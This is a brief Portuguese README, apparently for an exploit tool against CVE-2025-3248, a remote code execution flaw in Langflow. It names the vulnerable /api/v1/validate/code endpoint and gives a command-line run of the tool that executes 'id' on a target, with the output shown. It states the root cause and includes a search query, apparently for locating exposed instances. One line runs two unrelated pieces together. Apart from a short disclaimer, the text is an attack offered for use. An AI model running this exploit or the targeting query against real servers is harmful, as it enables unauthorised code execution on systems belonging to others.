
CVE-2025-3248 Langflow RCE Exploit
Exploit de Execução Remota de Código (RCE) para aplicações Langflow vulneráveis a CVE-2025-3248.
Endpoint Afetado:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() dinâmico em um caminho de código controlado pelo usuárioapp="Langflow"
Esta ferramenta é apenas para fins de teste de segurança educacional e autorizado. O uso não autorizado é proibido.